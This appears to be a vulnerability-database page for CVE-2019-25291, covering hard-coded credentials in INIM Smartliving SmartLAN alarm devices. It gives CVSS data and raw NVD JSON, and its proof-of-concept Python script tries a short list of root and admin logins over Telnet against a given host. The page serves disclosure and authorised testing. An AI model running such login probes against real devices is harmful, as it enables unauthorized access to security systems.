Security Vulnerability Report
CVE-2019-25291 CVSS 7.5 HIGH

CVE-2019-25291

Published: 2026-01-08 00:15:59
Last Modified: 2026-04-15 00:35:42

Description

INIM Electronics Smartliving SmartLAN/G/SI <=6.x contains hard-coded credentials in its Linux distribution image that cannot be changed through normal device operations. Attackers can exploit these persistent credentials to log in and gain unauthorized system access across multiple SmartLiving device models.

CVSS Details

CVSS Score
7.5 (CVSS v3.1 base score; the raw record below also carries a CVSS v4.0 base score of 9.3, CRITICAL)
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

INIM Smartliving SmartLAN/G <= 6.x
INIM Smartliving SmartLAN/SI <= 6.x
Other SmartLiving device models that use the same firmware

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
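#!/usr/bin/env python3
"""
CVE-2019-25291 PoC - INIM Smartliving SmartLAN Hard-coded Credentials
Reference: https://www.exploit-db.com/exploits/47763

The script opens one Telnet session to the given host and tries a short
list of logins. The list is not taken from the firmware image (see the
note next to it), so a negative result does not show that a device is
unaffected; the advisory scopes the issue by firmware version (<= 6.x).
"""
import socket
import sys
import time


def exploit_target(host, port=80):
    """
    Check whether a SmartLAN/G/SI device accepts a listed login over Telnet.

    Args:
        host: Address of the device under test.
        port: Only echoed in the "Target" line. The probe itself always
            connects to TCP/23; the parameter is kept so existing callers
            keep working.

    Returns:
        True if the reply after a login attempt looks like a shell prompt,
        False otherwise (port closed, no listed login matched, or any
        error, which is printed rather than raised).
    """
    # Common hard-coded credential patterns found in firmware analysis
    # Note: Actual credentials should be extracted from firmware dump
    default_credentials = [
        {'user': 'root', 'pass': 'password123'},
        {'user': 'admin', 'pass': 'admin'},
        {'user': 'inim', 'pass': 'inim2019'}
    ]

    print(f"[*] Target: {host}:{port}")
    print("[*] CVE-2019-25291: INIM Smartliving Hard-coded Credentials")

    # Attempt to connect via Telnet (common attack vector)
    try:
        # The context manager closes the socket on every exit path. The
        # earlier version returned on success, or jumped to the except
        # clause on a timeout, without ever closing it.
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
            sock.settimeout(10)
            if sock.connect_ex((host, 23)) != 0:
                print("[-] Telnet not accessible")
                return False

            print("[+] Telnet port open, attempting authentication...")

            # Banner grab
            banner = sock.recv(1024)
            print(f"[*] Banner: {banner.decode('utf-8', errors='ignore')}")

            for cred in default_credentials:
                sock.sendall(f"{cred['user']}\n".encode())
                time.sleep(0.5)
                sock.sendall(f"{cred['pass']}\n".encode())
                time.sleep(1)
                response = sock.recv(4096)

                # Heuristic only: an echoed user name, or a '#' or '$' in
                # a banner or error text, matches as well. Confirm a hit by
                # hand before recording the device as affected.
                if b'#' in response or b'$' in response or b'root' in response:
                    print(f"[!] SUCCESS: Authenticated with {cred['user']}:{cred['pass']}")
                    print("[!] Root access gained via hard-coded credential!")
                    return True
    except Exception as e:
        # Best-effort probe: report the failure and fall through to False.
        print(f"[-] Error: {e}")

    return False


if __name__ == "__main__":
    if len(sys.argv) < 2:
        print(f"Usage: {sys.argv[0]} <target_ip>")
        sys.exit(1)

    target = sys.argv[1]
    exploit_target(target)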

References

Raw JSON Data

{"cve": {"id": "CVE-2019-25291", "sourceIdentifier": "[email protected]", "published": "2026-01-08T00:15:59.143", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "INIM Electronics Smartliving SmartLAN/G/SI <=6.x contains hard-coded credentials in its Linux distribution image that cannot be changed through normal device operations. Attackers can exploit these persistent credentials to log in and gain unauthorized system access across multiple SmartLiving device models."}, {"lang": "es", "value": "INIM Electronics Smartliving SmartLAN/G/SI &lt;=6.x contiene credenciales codificadas de forma rígida en su imagen de distribución de Linux que no pueden cambiarse mediante las operaciones normales del dispositivo. Los atacantes pueden exploit estas credenciales persistentes para iniciar sesión y obtener acceso no autorizado al sistema en múltiples modelos de dispositivos SmartLiving."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", 
"modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-798"}]}], "references": [{"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/172838", "source": "[email protected]"}, {"url": "https://packetstormsecurity.com/files/155618", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/47763", "source": "[email protected]"}, {"url": "https://www.inim.biz/", "source": "[email protected]"}, {"url": "https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5546.php", "source": "[email protected]"}]}}